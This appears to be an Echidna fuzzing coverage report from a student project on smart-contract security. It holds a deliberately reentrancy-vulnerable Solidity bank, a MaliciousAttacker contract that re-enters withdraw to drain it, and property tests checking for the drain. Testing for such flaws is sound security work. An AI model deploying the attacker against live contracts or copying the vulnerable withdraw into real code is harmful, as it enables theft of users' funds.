/home/ali/TFG/pruebas-echidna/contracts/VulnerableBank.sol
  1 |     | // SPDX-License-Identifier: UNLICENSED
  2 |     | pragma solidity ^0.8.13;
  3 |     | 
  4 | *   | contract VulnerableBank {
  5 |     |     mapping(address => uint256) public balances;
  6 |     | 
  7 |     |     function deposit() public payable {
  8 |     |         balances[msg.sender] += msg.value;
  9 |     |     }
 10 |     | 
 11 |     |     function withdraw() public {
 12 |     |         uint256 balance = balances[msg.sender];
 13 |     |         require(balance > 0, "Insufficient balance");
 14 |     | 
 15 |     |         // Enviar la cantidad retirada al llamador (vulnerable a reentrancy)
 16 |     |         (bool success, ) = msg.sender.call{value: balance}("");
 17 |     |         require(success, "Transfer failed");
 18 |     | 
 19 |     |         balances[msg.sender] = 0;
 20 |     |     }
 21 |     | }

/home/ali/TFG/pruebas-echidna/echidna/ReentrancyEchidnaTest.sol
  1 |     | 
  2 |     | // SPDX-License-Identifier: UNLICENSED
  3 |     | pragma solidity ^0.8.13;
  4 |     | 
  5 |     | 
  6 |     | 
  7 |     | 
  8 |     | import "../contracts/VulnerableBank.sol";
  9 |     | 
 10 |     | 
 11 |     | 
 12 |     | 
 13 | *   | contract MaliciousAttacker {
 14 |     |    VulnerableBank public bank;
 15 |     |    uint256 public stolen;
 16 |     | 
 17 |     | 
 18 | *   |    constructor(address _target) {
 19 | *   |        bank = VulnerableBank(_target);
 20 |     |    }
 21 |     | 
 22 |     | 
 23 |     |    function deposit() external payable {
 24 |     |        bank.deposit{value: msg.value}();
 25 |     |    }
 26 |     | 
 27 |     | 
 28 |     |    function attack() external {
 29 |     |        bank.withdraw();
 30 |     |    }
 31 |     | 
 32 |     | 
 33 |     |    receive() external payable {
 34 |     |        stolen += msg.value;
 35 |     |        if (address(bank).balance > 0) {
 36 |     |            bank.withdraw();
 37 |     |        }
 38 |     |    }
 39 |     | }
 40 |     | 
 41 |     | 
 42 |     | 
 43 |     | 
 44 | *r  | contract ReentrancyEchidnaTest {
 45 |     |    VulnerableBank bank;
 46 |     |    MaliciousAttacker attacker;
 47 |     | 
 48 |     | 
 49 |     |    constructor() payable {
 50 | *   |        bank = new VulnerableBank();
 51 | *   |        attacker = new MaliciousAttacker(address(bank));
 52 |     |        //bank.deposit{value: 10}();
 53 |     |    }
 54 |     | 
 55 |     | 
 56 |     |    // Esta función ya no es necesaria como pública
 57 | *   |    function start_attack() public {
 58 | *r  |        attacker.deposit{value: 1}();
 59 |     |        attacker.attack();
 60 |     |    }
 61 |     | 
 62 |     | 
 63 |     |    function echidna_bank_not_drained() public payable returns (bool) {
 64 |     |        bank.deposit{value: 10}();           // Setup inicial
 65 |     |        attacker.deposit{value: 1}();
 66 |     |        attacker.attack();
 67 |     |        return address(bank).balance >= 10;
 68 |     |    }
 69 |     | 
 70 |     | 
 71 |     |    function echidna_attacker_cannot_steal() public payable returns (bool) {
 72 |     |        bank.deposit{value: 10}();
 73 |     |        attacker.deposit{value: 1}();
 74 |     |        attacker.attack();
 75 |     |        return attacker.stolen() <= 1;
 76 |     |    }
 77 |     | 
 78 |     | 
 79 |     |    function echidna_simple_steal_test() public payable returns (bool) {
 80 |     |        uint256 before = address(bank).balance;
 81 |     |        bank.deposit{value: 10}();
 82 |     |        attacker.deposit{value: 1}();
 83 |     |        attacker.attack();
 84 |     |        uint256 af = address(bank).balance;
 85 |     |        return af >= before;  // "No pierdo fondos"
 86 |     |    }
 87 |     | }
 88 |     | 

